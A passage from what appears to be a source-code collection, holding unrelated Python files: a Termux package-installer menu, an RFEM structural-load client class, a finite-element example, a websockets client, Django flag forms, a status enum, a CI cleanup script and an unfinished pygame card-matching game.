Termux-pkg-apt.py
Hironotori/Termux-pkg-apt
1
11057
#!/usr/bin/python3 import os import time import sys os.system("clear") print('''\033[91m CREATED BY Hironotori ''') def slowprint(s): for c in s + '\n' : sys.stdout.write(c) sys.stdout.flush() slowprint(''' \033[93m [1] apt-pkg pip-pip3 [2] apt-pkg python [3] apt-pkg python2 [4] apt-pkg bash [5] apt-pkg git [6] apt-pkg perl [7] apt-pkg nano [8] apt-pkg curl [9] apt-pkg openssl [10] apt-pkg openssh [11] apt-pkg wget [12] apt-pkg clang [13] apt-pkg nmap [14] apt-pkg w3m [15] apt-pkg ruby [16] apt-pkg dnsutils [17] apt-pkg coreutils [18] apt-pkg fish. [19] apt-pkg zip [20] apt-pkg figlet. [21] apt-pkg cowsay [22] apt-pkg unzip. [23] apt-pkg vim [24] apt-pkg wcalc. [25] apt-pkg bmon [26] apt-pkg unrar. [27] apt-pkg proot [28] apt-pkg golang. [29] apt-pkg tsu [30] apt-pkg tor. [31] apt-pkg php [00] Установить все Вместе [0] Выход''') print (" ") choice = input("\033[93mВыберите пункт : ") if choice == '0' : sys.exit() if choice == '1' : os.system ("apt upgrade -y") os.system ("pkg install") os.system ("pkg upgrade") os.system ("apt install") os.system ("apt upgrade") os.system ("apt update") os.system ("pkg update") os.system("python -m pip install --upgrade pip") os.system ("pip3 install --upgrade setuptools pip") os.system ("termux-setup-storage") sys.exit () if choice == '2' : os.system ("apt upgrade -y") os.system ("pkg install") os.system ("pkg upgrade") os.system ("apt install") os.system ("apt upgrade") os.system ("apt update") os.system ("pkg update") os.system ("pkg install python -y") os.system ("pkg upgrade python -y") os.system ("apt install python -y") os.system ("apt upgrade python -y") os.system ("termux-setup-storage") sys.exit () if choice == '3' : os.system ("apt upgrade -y") os.system ("pkg install") os.system ("pkg upgrade") os.system ("apt install") os.system ("apt upgrade") os.system ("apt update") os.system ("pkg update") os.system ("pkg install python2 -y") os.system ("pkg upgrade python2 -y") os.system ("apt install python2 -y") os.system ("apt upgrade python2 -y") os.system ("termux-setup-storage") sys.exit () if choice == '4' : os.system ("apt upgrade -y") os.system ("pkg install") os.system ("pkg upgrade") os.system ("apt install") os.system ("apt upgrade") os.system ("apt update") os.system ("pkg update") os.system ("pkg install bash") os.system ("apt install bash") os.system ("pkg upgrade bash") os.system ("apt upgrade bash") os.system ("termux-setup-storage") sys.exit () if choice == '5' : os.system ("apt upgrade -y") os.system ("pkg install") os.system ("pkg upgrade") os.system ("apt install") os.system ("apt upgrade") os.system ("apt update") os.system ("pkg update") os.system ("apt install git -y") os.system ("pkg install git -y") os.system ("pkg upgrade git -y") os.system ("apt upgrade git -y") os.system ("termux-setup-storage") sys.exit () if choice == '6' : os.system ("apt upgrade -y") os.system ("pkg install") os.system ("pkg upgrade") os.system ("apt install") os.system ("apt upgrade") os.system ("apt update") os.system ("pkg update") os.system ("pkg install perl -y") os.system ("apt install perl -y") os.system ("pkg upgrade perl -y") os.system ("apt upgrade perl -y") os.system ("termux-setup-storage") sys.exit () if choice == '7' : os.system ("apt upgrade -y") os.system ("pkg install") os.system ("pkg upgrade") os.system ("apt install") os.system ("apt upgrade") os.system ("apt update") os.system ("pkg update") os.system ("pkg install nano -y") os.system ("apt install nano -y") os.system ("pkg upgrade nano -y") os.system ("apt upgrade nano -y") os.system ("termux-setup-storage") sys.exit () if choice == '8' : os.system ("apt upgrade -y") os.system ("pkg install") os.system ("pkg upgrade") os.system ("apt install") os.system ("apt upgrade") os.system ("apt update") os.system ("pkg update") os.system ("pkg install curl -y") os.system ("apt install curl -y") os.system ("pkg upgrade curl -y") os.system ("apt upgrade curl -y") os.system ("termux-setup-storage") sys.exit () if choice == '9' : os.system ("apt upgrade -y") os.system ("pkg install") os.system ("pkg upgrade") os.system ("apt install") os.system ("apt upgrate") os.system ("apt update") os.system ("pkg update") os.system ("pkg install openssl -y") os.system ("apt install openssl -y") os.system ("pkg upgrade openssl -y") os.system ("apt upgrade openssl -y") os.system ("termux-setup-storage") sys.exit () if choice == '10' : os.system ("apt upgrade -y") os.system ("pkg install") os.system ("pkg upgrade") os.system ("apt install") os.system ("apt upgrate") os.system ("apt update") os.system ("pkg update") os.system ("pkg install openssh -y") os.system ("apt install openssh -y") os.system ("pkg upgrade openssh -y") os.system ("apt upgrade openssh -y") os.system ("termux-setup-storage") sys.exit () if choice == '11' : os.system ("apt upgrade -y") os.system ("pkg install") os.system ("pkg upgrade") os.system ("apt install") os.system ("apt upgrate") os.system ("apt update") os.system ("pkg update") os.system ("pkg install wget -y") os.system ("apt install wget -y") os.system ("pkg upgrade wget -y") os.system ("apt upgrade wget -y") os.system ("termux-setup-storage") sys.exit () if choice == '12' : os.system ("apt upgrade -y") os.system ("pkg install") os.system ("pkg upgrade") os.system ("apt install") os.system ("apt upgrate") os.system ("apt update") os.system ("pkg update") os.system ("pkg install clang -y") os.system ("apt install clang -y") os.system ("pkg upgrade clang -y") os.system ("apt upgrade clang -y") os.system ("termux-setup-storage") sys.exit () if choice == '13' : os.system ("apt upgrade -y") os.system ("pkg install") os.system ("pkg upgrade") os.system ("apt install") os.system ("apt upgrate") os.system ("apt update") os.system ("pkg update") os.system ("pkg install nmap -y") os.system ("apt install nmap -y") os.system ("pkg upgrade nmap -y") os.system ("apt upgrade nmap -y") os.system ("termux-setup-storage") sys.exit () if choice == '14' : os.system ("apt upgrade -y") os.system ("pkg install") os.system ("pkg upgrade") os.system ("apt install") os.system ("apt upgrate") os.system ("apt update") os.system ("pkg update") os.system ("pkg install w3m -y") os.system ("apt install w3m -y") os.system ("pkg upgrade w3m -y") os.system ("apt upgrade w3m -y") os.system ("termux-setup-storage") sys.exit () if choice == '15' : os.system ("apt upgrade -y") os.system ("pkg install") os.system ("pkg upgrade") os.system ("apt install") os.system ("apt upgrate") os.system ("apt update") os.system ("pkg update") os.system ("pkg install ruby -y") os.system ("apt install ruby -y") os.system ("pkg upgrade ruby -y") os.system ("apt upgrade ruby -y") os.system ("termux-setup-storage") sys.exit () if choice == '16' : os.system ("apt upgrade -y") os.system ("pkg install") os.system ("pkg upgrade") os.system ("apt install") os.system ("apt upgrate") os.system ("apt update") os.system ("pkg update") os.system ("pkg install dnsutils -y") os.system ("apt install dnsutils -y") os.system ("pkg upgrade dnsutils -y") os.system ("apt upgrade dnsutils -y") os.system ("termux-setup-storage") sys.exit () if choice == '17' : os.system ("apt upgrade -y") os.system ("pkg install") os.system ("pkg upgrade") os.system ("apt install") os.system ("apt upgrate") os.system ("apt update") os.system ("pkg update") os.system ("pkg install coreutils -y") os.system ("apt install coreutils -y") os.system ("pkg upgrade coreutils -y") os.system ("apt upgrade coreutils -y") os.system ("termux-setup-storage") sys.exit () if choice == '18' : os.system ("apt upgrade -y") os.system ("pkg install") os.system ("pkg upgrade") os.system ("apt install") os.system ("apt upgrate") os.system ("apt update") os.system ("pkg update") os.system ("pkg install fish -y") os.system ("apt install fish -y") os.system ("pkg upgrade fish -y") os.system ("apt upgrade fish -y") os.system ("termux-setup-storage") sys.exit () if choice == '19' : os.system ("apt upgrade -y") os.system ("pkg install") os.system ("pkg upgrade") os.system ("apt install") os.system ("apt upgrate") os.system ("apt update") os.system ("pkg update") os.system ("pkg install zip -y") os.system ("apt install zip -y") os.system ("pkg upgrade zip -y") os.system ("apt upgrade zip -y") os.system ("termux-setup-storage") sys.exit () if choice == '20' : os.system ("apt upgrade -y") os.system ("pkg install") os.system ("pkg upgrade") os.system ("apt install") os.system ("apt upgrate") os.system ("apt update") os.system ("pkg update") os.system ("pkg install figlet -y") os.system ("apt install figlet -y") os.system ("pkg upgrade figlet -y") os.system ("apt upgrade figlet -y") os.system ("termux-setup-storage") sys.exit () if choice == '21' : os.system ("apt upgrade -y") os.system ("pkg install") os.system ("pkg upgrade") os.system ("apt install") os.system ("apt upgrate") os.system ("apt update") os.system ("pkg update") os.system ("pkg install cowsay -y") os.system ("apt install cowsay -y") os.system ("pkg upgrade cowsay -y") os.system ("apt upgrade cowsay -y") os.system ("termux-setup-storage") sys.exit () if choice == '22' : os.system ("apt upgrade -y") os.system ("pkg install") os.system ("pkg upgrade") os.system ("apt install") os.system ("apt upgrate") os.system ("apt update") os.system ("pkg update") os.system ("pkg install unzip -y") os.system ("apt install unzip -y") os.system ("pkg upgrade unzip -y") os.system ("apt upgrade unzip -y") os.system ("termux-setup-storage") sys.exit () if choice == '23' : os.system ("apt upgrade -y") os.system ("pkg install") os.system ("pkg upgrade") os.system ("apt install") os.system ("apt upgrate") os.system ("apt update") os.system ("pkg update") os.system ("pkg install vim -y") os.system ("apt install vim -y") os.system ("pkg upgrade vim -y") os.system ("apt upgrade vim -y") os.system ("termux-setup-storage") sys.exit () if choice == '24' : os.system ("apt upgrade -y") os.system ("pkg install") os.system ("pkg upgrade") os.system ("apt install") os.system ("apt upgrate") os.system ("apt update") os.system ("pkg update") os.system ("pkg install wcalc -y") os.system ("apt install wcalc -y") os.system ("pkg upgrade wcalc -y") os.system ("apt upgrade wcalc -y") os.system ("termux-setup-storage") sys.exit () if choice == '25' : os.system ("apt upgrade -y") os.system ("pkg install") os.system ("pkg upgrade") os.system ("apt install") os.system ("apt upgrate") os.system ("apt update") os.system ("pkg update") os.system ("pkg install bmon -y") os.system ("apt install bmon -y") os.system ("pkg upgrade bmon -y") os.system ("apt upgrade bmon -y") os.system ("termux-setup-storage") sys.exit () if choice == '26' : os.system ("apt upgrade -y") os.system ("pkg install") os.system ("pkg upgrade") os.system ("apt install") os.system ("apt upgrate") os.system ("apt update") os.system ("pkg update") os.system ("pkg install unrar -y") os.system ("apt install unrar -y") os.system ("pkg upgrade unrar -y") os.system ("apt upgrade unrar -y") os.system ("termux-setup-storage") sys.exit () if choice == '27' : os.system ("apt upgrade -y") os.system ("pkg install") os.system ("pkg upgrade") os.system ("apt install") os.system ("apt upgrate") os.system ("apt update") os.system ("pkg update") os.system ("pkg install proot -y") os.system ("apt install proot -y") os.system ("pkg upgrade proot -y") os.system ("apt upgrade proot -y") os.system ("termux-setup-storage") sys.exit () if choice == '28' : os.system ("apt upgrade -y") os.system ("pkg install") os.system ("pkg upgrade") os.system ("apt install") os.system ("apt upgrate") os.system ("apt update") os.system ("pkg update") os.system ("pkg install golang -y") os.system ("apt install golang -y") os.system ("pkg upgrade golang -y") os.system ("apt upgrade golang -y") os.system ("termux-setup-storage") sys.exit () if choice == '29' : os.system ("apt upgrade -y") os.system ("pkg install") os.system ("pkg upgrade") os.system ("apt install") os.system ("apt upgrate") os.system ("apt update") os.system ("pkg update") os.system("pkg install tsu-y") os.system ("apt install tsu -y") os.system ("pkg upgrade tsu -y") os.system ("apt upgrade tsu -y") os.system ("termux-setup-storage") sys.exit () if choice == '30' : os.system ("apt upgrade -y") os.system ("pkg install") os.system ("pkg upgrade") os.system ("apt install") os.system ("apt upgrate") os.system ("apt update") os.system ("pkg update") os.system ("pkg install tor") os.system ("termux-setup-storage") sys.exit () if choice == '31' : os.system ("apt upgrade -y") os.system ("pkg install") os.system ("pkg upgrade") os.system ("apt install") os.system ("apt upgrate") os.system ("apt update") os.system ("pkg update") os.system ("pkg install php -y") os.system ("pkg upgrade php -y") os.system ("apt install php -y") os.system ("apt upgrade php -y") os.system ("termux-setup-storage") sys.exit () if choice == '00' : os.system ("apt upgrade -y") os.system ("pkg install") os.system ("pkg upgrade") os.system ("apt install") os.system ("apt upgrate") os.system ("apt update") os.system ("pkg update") os.system("python -m pip install --upgrade pip") os.system ("pip3 install --upgrade setuptools pip") os.system ("pkg install python -y") os.system ("pkg upgrade python -y") os.system ("apt install python -y") os.system ("apt upgrade python -y") os.system ("pkg install python2 -y") os.system ("pkg upgrade python2 -y") os.system ("apt install python2 -y") os.system ("apt upgrade python2 -y") os.system ("pkg install php -y") os.system ("pkg upgrade php -y") os.system ("apt install php -y") os.system ("apt upgrade php -y") os.system ("pkg install bash") os.system ("apt install bash") os.system ("pkg upgrade bash") os.system ("apt upgrade bash") os.system ("apt install git -y") os.system ("pkg install git -y") os.system ("pkg upgrade git -y") os.system ("apt upgrade git -y") os.system ("pkg install perl -y") os.system ("apt install perl -y") os.system ("pkg upgrade perl -y") os.system ("apt upgrade perl -y") os.system ("pkg install nano -y") os.system ("apt install nano -y") os.system ("pkg upgrade nano -y") os.system ("apt upgrade nano -y") os.system ("pkg install curl -y") os.system ("apt install curl -y") os.system ("pkg upgrade curl -y") os.system ("apt upgrade curl -y") os.system ("pkg install openssl -y") os.system ("apt install openssl -y") os.system ("pkg upgrade openssl -y") os.system ("apt upgrade openssl -y") os.system ("pkg install openssh -y") os.system ("apt install openssh -y") os.system ("pkg upgrade openssh -y") os.system ("apt upgrade openssh -y") os.system ("pkg install wget -y") os.system ("apt install wget -y") os.system ("pkg upgrade wget -y") os.system ("apt upgrade wget -y") os.system ("pkg install clang -y") os.system ("apt install clang -y") os.system ("pkg upgrade clang -y") os.system ("apt upgrade clang -y") os.system ("pkg install nmap -y") os.system ("apt install nmap -y") os.system ("pkg upgrade nmap -y") os.system ("apt upgrade nmap -y") os.system ("pkg install w3m -y") os.system ("apt install w3m -y") os.system ("pkg upgrade w3m -y") os.system ("apt upgrade w3m -y") os.system ("pkg install ruby -y") os.system ("apt install ruby -y") os.system ("pkg upgrade ruby -y") os.system ("apt upgrade ruby -y") os.system ("pkg install dnsutils -y") os.system ("apt install dnsutils -y") os.system ("pkg upgrade dnsutils -y") os.system ("apt upgrade dnsutils -y") os.system ("pkg install coreutils -y") os.system ("apt install coreutils -y") os.system ("pkg upgrade coreutils -y") os.system ("apt upgrade coreutils -y") os.system ("pkg install fish -y") os.system ("apt install fish -y") os.system ("pkg upgrade fish -y") os.system ("apt upgrade fish -y") os.system ("pkg install zip -y") os.system ("apt install zip -y") os.system ("pkg upgrade zip -y") os.system ("apt upgrade zip -y") os.system ("pkg install figlet -y") os.system ("apt install figlet -y") os.system ("pkg upgrade figlet -y") os.system ("apt upgrade figlet -y") os.system ("pkg install cowsay -y") os.system ("apt install cowsay -y") os.system ("pkg upgrade cowsay -y") os.system ("apt upgrade cowsay -y") os.system ("pkg install unzip -y") os.system ("apt install unzip -y") os.system ("pkg upgrade unzip -y") os.system ("apt upgrade unzip -y") os.system ("pkg install vim -y") os.system ("apt install vim -y") os.system ("pkg upgrade vim -y") os.system ("apt upgrade vim -y") os.system ("pkg install wcalc -y") os.system ("apt install wcalc -y") os.system ("pkg upgrade wcalc -y") os.system ("apt upgrade wcalc -y") os.system ("pkg install bmon -y") os.system ("apt install bmon -y") os.system ("pkg upgrade bmon -y") os.system ("apt upgrade bmon -y") os.system ("pkg install unrar -y") os.system ("apt install unrar -y") os.system ("pkg upgrade unrar -y") os.system ("apt upgrade unrar -y") os.system ("pkg install proot -y") os.system ("apt install proot -y") os.system ("pkg upgrade proot -y") os.system ("apt upgrade proot -y") os.system ("pkg install golang -y") os.system ("apt install golang -y") os.system ("pkg upgrade golang -y") os.system ("apt upgrade golang -y") os.system("pkg install tsu-y") os.system ("apt install tsu -y") os.system ("pkg upgrade tsu -y") os.system ("apt upgrade tsu -y") os.system ("pkg install tor") os.system ("termux-setup-storage") sys.exit ()
2.421875
2
RFEM/Loads/solidSetLoad.py
DavidNaizheZhou/RFEM_Python_Client
16
11058
<reponame>DavidNaizheZhou/RFEM_Python_Client<gh_stars>10-100 from RFEM.initModel import Model, clearAtributes, ConvertToDlString from RFEM.enums import SolidSetLoadType, SolidSetLoadDistribution, SolidSetLoadDirection class SolidSetLoad(): def __init__(self, no: int =1, load_case_no: int = 1, solid_sets_no: str= '1', load_type = SolidSetLoadType.LOAD_TYPE_FORCE, load_distribution = SolidSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM, load_direction = SolidSetLoadDirection.LOAD_DIRECTION_GLOBAL_Z_OR_USER_DEFINED_W_TRUE, magnitude: float = 0, comment: str = '', params: dict = {}): # Client model | Solid Load clientObject = Model.clientModel.factory.create('ns0:solid_set_load') # Clears object attributes | Sets all attributes to None clearAtributes(clientObject) # Load No. clientObject.no = no # Load Case No. clientObject.load_case = load_case_no # Assigned Solid No. clientObject.solid_sets = ConvertToDlString(solid_sets_no) # Load Type clientObject.load_type = load_type.name # Load Distribution clientObject.load_distribution = load_distribution.name # Load Direction clientObject.load_direction = load_direction.name # Load Magnitude clientObject.uniform_magnitude = magnitude # Comment clientObject.comment = comment # Adding optional parameters via dictionary for key in params: clientObject[key] = params[key] # Add Solid Load to client model Model.clientModel.service.set_solid_set_load(load_case_no, clientObject) def Force(self, no: int =1, load_case_no: int = 1, solid_sets_no: str= '1', load_direction = SolidSetLoadDirection.LOAD_DIRECTION_GLOBAL_Z_OR_USER_DEFINED_W_TRUE, magnitude: float = 0, comment: str = '', params: dict = {}): # Client model | Solid Load clientObject = Model.clientModel.factory.create('ns0:solid_set_load') # Clears object attributes | Sets all attributes to None clearAtributes(clientObject) # Load No. clientObject.no = no # Load Case No. clientObject.load_case = load_case_no # Assigned Solid No. clientObject.solid_sets = ConvertToDlString(solid_sets_no) # Load Type clientObject.load_type = SolidSetLoadType.LOAD_TYPE_FORCE.name # Load Distribution clientObject.load_distribution = SolidSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM.name # Load Direction clientObject.load_direction = load_direction.name # Load Magnitude clientObject.uniform_magnitude = magnitude # Comment clientObject.comment = comment # Adding optional parameters via dictionary for key in params: clientObject[key] = params[key] # Add Solid Load to client model Model.clientModel.service.set_solid_set_load(load_case_no, clientObject) def Temperature(self, no: int = 1, load_case_no: int = 1, solid_sets_no: str= '1', load_distribution = SolidSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM, load_parameter = None, comment: str = '', params: dict = {}): ''' load_parameter: LOAD_DISTRIBUTION_UNIFORM: load_parameter = magnitude LOAD_DISTRIBUTION_LINEAR_IN_X: load_parameter = [magnitude_1, magnitude_2, node_1, node_2] LOAD_DISTRIBUTION_LINEAR_IN_Y: load_parameter = [magnitude_1, magnitude_2, node_1, node_2] LOAD_DISTRIBUTION_LINEAR_IN_Z: load_parameter = [magnitude_1, magnitude_2, node_1, node_2] params: {''} ''' # Client model | Solid Load clientObject = Model.clientModel.factory.create('ns0:solid_set_load') # Clears object attributes | Sets all attributes to None clearAtributes(clientObject) # Load No. clientObject.no = no # Load Case No. clientObject.load_case = load_case_no # Assigned Solid No. clientObject.solid_sets = ConvertToDlString(solid_sets_no) # Load Type clientObject.load_type = SolidSetLoadType.LOAD_TYPE_TEMPERATURE.name # Load Distribution if load_distribution.name == "LOAD_DISTRIBUTION_UNIFORM": clientObject.uniform_magnitude = load_parameter else: clientObject.magnitude_1 = load_parameter[0] clientObject.magnitude_2 = load_parameter[1] clientObject.node_1 = load_parameter[2] clientObject.node_2 = load_parameter[3] clientObject.load_distribution = load_distribution.name # Comment clientObject.comment = comment # Adding optional parameters via dictionary for key in params: clientObject[key] = params[key] # Add Solid Load to client model Model.clientModel.service.set_solid_set_load(load_case_no, clientObject) def Strain(self, no: int = 1, load_case_no: int = 1, solid_sets_no: str= '1', load_distribution = SolidSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM, load_parameter = None, comment: str = '', params: dict = {}): ''' load_parameter: LOAD_DISTRIBUTION_UNIFORM: load_parameter = [strain_uniform_magnitude_x, strain_uniform_magnitude_y, strain_uniform_magnitude_z] LOAD_DISTRIBUTION_LINEAR_IN_X: load_parameter = [strain_magnitude_x1, strain_magnitude_y1, strain_magnitude_z1, strain_magnitude_x2, strain_magnitude_y2, strain_magnitude_z2, node_1, node_2] LOAD_DISTRIBUTION_LINEAR_IN_Y: load_parameter = [strain_magnitude_x1, strain_magnitude_y1, strain_magnitude_z1, strain_magnitude_x2, strain_magnitude_y2, strain_magnitude_z2, node_1, node_2] LOAD_DISTRIBUTION_LINEAR_IN_Z: load_parameter = [strain_magnitude_x1, strain_magnitude_y1, strain_magnitude_z1, strain_magnitude_x2, strain_magnitude_y2, strain_magnitude_z2, node_1, node_2] params: {''} ''' # Client model | Solid Load clientObject = Model.clientModel.factory.create('ns0:solid_set_load') # Clears object attributes | Sets all attributes to None clearAtributes(clientObject) # Load No. clientObject.no = no # Load Case No. clientObject.load_case = load_case_no # Assigned Solid No. clientObject.solid_sets = ConvertToDlString(solid_sets_no) # Load Type clientObject.load_type = SolidSetLoadType.LOAD_TYPE_STRAIN.name # Load Distribution if load_distribution.name == "LOAD_DISTRIBUTION_UNIFORM": clientObject.strain_uniform_magnitude_x = load_parameter[0] clientObject.strain_uniform_magnitude_y = load_parameter[1] clientObject.strain_uniform_magnitude_z = load_parameter[2] else: clientObject.strain_magnitude_x1 = load_parameter[0] clientObject.strain_magnitude_y1 = load_parameter[1] clientObject.strain_magnitude_z1 = load_parameter[2] clientObject.strain_magnitude_x2 = load_parameter[3] clientObject.strain_magnitude_y2 = load_parameter[4] clientObject.strain_magnitude_z2 = load_parameter[5] clientObject.node_1 = load_parameter[6] clientObject.node_2 = load_parameter[7] clientObject.load_distribution = load_distribution.name # Comment clientObject.comment = comment # Adding optional parameters via dictionary for key in params: clientObject[key] = params[key] # Add Solid Load to client model Model.clientModel.service.set_solid_set_load(load_case_no, clientObject) def Motion(self, no: int = 1, load_case_no: int = 1, solid_sets_no: str= '1', load_parameter = None, comment: str = '', params: dict = {}): ''' load_parameter: load_parameter = [angular_velocity, angular_acceleration, axis_definition_p1_x, axis_definition_p1_y, axis_definition_p1_z, axis_definition_p2_x, axis_definition_p2_y, axis_definition_p2_z] params: {''} ''' # Client model | Solid Load clientObject = Model.clientModel.factory.create('ns0:solid_set_load') # Clears object attributes | Sets all attributes to None clearAtributes(clientObject) # Load No. clientObject.no = no # Load Case No. clientObject.load_case = load_case_no # Assigned Solid No. clientObject.solid_sets = ConvertToDlString(solid_sets_no) # Load Type clientObject.load_type = SolidSetLoadType.LOAD_TYPE_ROTARY_MOTION.name # Velocity clientObject.angular_velocity = load_parameter[0] # Acceleration clientObject.angular_acceleration = load_parameter[1] # Axis Definition clientObject.axis_definition_p1_x = load_parameter[2] clientObject.axis_definition_p1_y = load_parameter[3] clientObject.axis_definition_p1_z = load_parameter[4] clientObject.axis_definition_p2_x = load_parameter[5] clientObject.axis_definition_p2_y = load_parameter[6] clientObject.axis_definition_p2_z = load_parameter[7] # Comment clientObject.comment = comment # Adding optional parameters via dictionary for key in params: clientObject[key] = params[key] # Add Solid Load to client model Model.clientModel.service.set_solid_set_load(load_case_no, clientObject) #def Buoyancy(): # print('The function Buoyancy() is not implemented yet.') #def Gas(): # print('The function Gas() is not implemented yet.')
2.265625
2
examples_2d/patch.py
5A5H/PyFEMP
1
11059
<gh_stars>1-10 # 2D example tensile test import numpy as np import matplotlib.pyplot as plt import PyFEMP import PyFEMP.elements.Elmt_BaMo_2D as ELEMENT FEM = PyFEMP.FEM_Simulation(ELEMENT) n = 4 XI, Elem = PyFEMP.msh_rec([0.0, 0.0], [10.0, 10.0], [n, n], type='Q1') FEM.Add_Mesh(XI, Elem) FEM.Add_Material([2100, 0.3], "All") FEM.Add_EBC("x==0", "UX", 0) FEM.Add_EBC("y==0", "UY", 0) FEM.Add_EBC("x==10", "UX", 1) FEM.Analysis() FEM.NextStep(1.0, 1.0) print( FEM.NewtonIteration() ) print( FEM.NewtonIteration() ) ux = FEM.NodalDof("x==10 and y==10", "UX") uy = FEM.NodalDof("x==10 and y==10", "UY") print('ux :',ux, 'uy :',uy) fig, ax = plt.subplots(1,1, figsize=(8.0, 8.0)) postplot = FEM.ShowMesh(ax, ec='b', label='reference config.') postplot = FEM.ShowMesh(ax, deformedmesh=True, ec='r', label='current config.') ax.legend() plt.show()
2.5
2
common-patterns/producer_consumer_client.py
kyeett/websockets-examples
0
11060
<reponame>kyeett/websockets-examples #!/usr/bin/env python import asyncio import websockets import os port = int(os.environ.get('PORT', '8765')) async def hello(): print("Starting client on :%s" % port) async with websockets.connect('ws://localhost:%s' % port) as websocket: msg = 'Client msg #1' await websocket.send(msg) print('> {}'.format(msg)) i = 0 while True: greeting = await websocket.recv() i += 1 print("< {}".format(greeting)) asyncio.get_event_loop().run_until_complete(hello())
3.46875
3
wagtailflags/forms.py
cfpb/wagtail-flags
75
11061
<filename>wagtailflags/forms.py from django import forms from flags.forms import FlagStateForm as DjangoFlagsFlagStateForm from flags.models import FlagState from flags.sources import get_flags class NewFlagForm(forms.ModelForm): name = forms.CharField(label="Name", required=True) def clean_name(self): name = self.cleaned_data["name"] if name in get_flags(): raise forms.ValidationError( "Flag named {} already exists".format(name) ) return name def save(self, commit=True): obj = super(NewFlagForm, self).save(commit=False) obj.condition = "boolean" obj.value = "False" obj.required = False obj.save() return obj class Meta: model = FlagState fields = ("name",) class FlagStateForm(DjangoFlagsFlagStateForm): name = forms.CharField( label="Flag", required=True, disabled=True, widget=forms.HiddenInput(), ) class Meta: model = FlagState fields = ("name", "condition", "value", "required")
2.296875
2
src/utils/utils.py
GuiYuDaniel/CGC_of_Sn
0
11062
<reponame>GuiYuDaniel/CGC_of_Sn<filename>src/utils/utils.py # -*- coding:utf8 -*- """ 一些其他工具 当需要细化或者函数太多时,应该把其中一些独立出去 """ import uuid from enum import Enum, unique from utils.log import get_logger logger = get_logger(__name__) @unique class PipeTaskStatus(Enum): # 还不够需要写状态机,先用这个凑活一下 """ name is Status value is Next """ # TODO 多线程时应该增加STOPPING, WAITING等状态 # TODO 为了避免Enum键值对别名的规则,引入一个None占位,None无意义,不是一个状态! PREPARATION = ["DOING", "FAIL"] # preparation是准备阶段,计算、保存一切运行的必要信息,未准备结束的ppt是不支持restart的 DOING = ["SUCCESS", "FAIL", "RESTARTING"] SUCCESS = [] FAIL = ["RESTARTING"] RESTARTING = ["DOING", "FAIL", None] # restarting是重启的准备阶段,准备好后直接进入doing # STOPPING = [] # WAITING = [] def new_id(is_log=True): _id = str(uuid.uuid4()) if is_log: logger.debug("new an id={} with uuid4 method".format(_id)) return _id
2.265625
2
extras/scripts/finish_ci.py
connornishijima/PixieChroma
20
11063
<reponame>connornishijima/PixieChroma # This is just for GitHub, and is used to clean up leftover files after # automatic testing has completed, and generate developer reports about # anything left undocumented! # run: "sudo python ./extras/scripts/finish_ci.py" import os import sys os.system("sudo python ./extras/scripts/generate_doxygen_report.py") os.system("sudo python ./extras/scripts/generate_keywords_report.py") os.system("sudo python ./extras/scripts/generate_overview_report.py") print("Cleaning up CI junk...") os.system("ls .") os.system("git add *") os.system("sudo rm -r *.tar*") os.system("sudo rm -r examples/*/build") os.system("git commit -a -m 'Automated Cleanup'") os.system("git push") print("Done!" )
2.296875
2
matchingGame.py
VinnieM-3/MemoryGames
0
11064
import pygame import random pygame.init() pygame.font.init() class Card(object): """ The Card Class """ def __init__(self, left, top, width, height, back_color, front_color, solved_color, display, font_color, text_font, value=None): self._rect = pygame.Rect(left, top, width, height) self._display = display self._back_color = back_color # color of card when face down self._front_color = front_color # color of card when face up self._solved_color = solved_color # color of card after it is matched self._font_color = font_color self._text_font = text_font self._value = value # the number we are trying to match self._unsolved = True # is set to false once matched self._hidden = True # card is face down to start self._times_seen = 0 # number of times player viewed card @property def value(self): return self._value @value.setter def value(self, value): self._value = value @property def times_seen(self): return self._times_seen def solved(self): self._unsolved = False pygame.draw.rect(self._display, self._solved_color, self._rect) def is_unsolved(self): return self._unsolved def is_clicked(self, pos): x_pos, y_pos = pos return self._rect.collidepoint(x_pos, y_pos) # did player click on this card? def is_hidden(self): return self._hidden def show_card(self): self._hidden = False self._times_seen += 1 pygame.draw.rect(self._display, self._front_color, self._rect) text_surface = self._text_font.render(self._value, True, self._font_color) self._display.blit(text_surface, (self._rect.center[0] - (text_surface.get_width() / 2), self._rect.center[1] - (text_surface.get_height() / 2))) def hide_card(self): self._hidden = True pygame.draw.rect(self._display, self._back_color, self._rect) def get_matching_card(card_list, card_to_match): """ This function returns the card that matches the one passed in """ the_matching_card = None for test_card in card_list: if test_card.value == card_to_match.value and test_card != card_to_match: the_matching_card = test_card break return the_matching_card def cards_remaining(card_list): """ this function returns the number of cards that have not been matched yet """ num_remaining = 0 for c in card_list: if c.is_unsolved(): num_remaining += 1 return num_remaining if __name__ == "__main__": display_width = 600 display_height = 600 card_font = pygame.font.SysFont('Comic Sans MS', 48) front_col = pygame.Color('white') solved_col = pygame.Color('#636363') back_col = pygame.Color('#293a32') font_col = pygame.Color('black') score_font = pygame.font.SysFont('Comic Sans MS', 24) score_txt_col = pygame.Color('#d4c38f') score_y_margin = 50 score_x_margin = 20 player_closed_app = False new_game = False cards = [] game_display = pygame.display.set_mode((display_width, display_height)) pygame.display.set_caption('Matching Game') game_display.fill(pygame.Color('#b5c9a6')) score_rect = pygame.draw.rect(game_display, pygame.Color('black'), pygame.Rect(0, 0, display_width, score_y_margin)) surf_8x8_txt = score_font.render("8 x 8", True, score_txt_col) left_pos = (game_display.get_width() - score_x_margin - surf_8x8_txt.get_width()) surf_8x8_rect = game_display.blit(surf_8x8_txt, (left_pos, (score_y_margin - surf_8x8_txt.get_height()) / 2)) surf_6x6_txt = score_font.render("6 x 6", True, score_txt_col) left_pos = left_pos - surf_6x6_txt.get_width() - score_x_margin surf_6x6_rect = game_display.blit(surf_6x6_txt, (left_pos, (score_y_margin - surf_6x6_txt.get_height()) / 2)) surf_4x4_txt = score_font.render("4 x 4", True, score_txt_col) left_pos = left_pos - surf_4x4_txt.get_width() - score_x_margin surf_4x4_rect = game_display.blit(surf_4x4_txt, (left_pos, (score_y_margin - surf_4x4_txt.get_height()) / 2)) surf_sel_txt = score_font.render("Select Game:", True, score_txt_col) left_pos = left_pos - surf_sel_txt.get_width() - score_x_margin game_display.blit(surf_sel_txt, (left_pos, (score_y_margin - surf_sel_txt.get_height()) / 2)) num_cols = 0 num_rows = 0 pick_1 = None # variable to hold first card selected by player score = 0 max_score = 0 # maximum score a 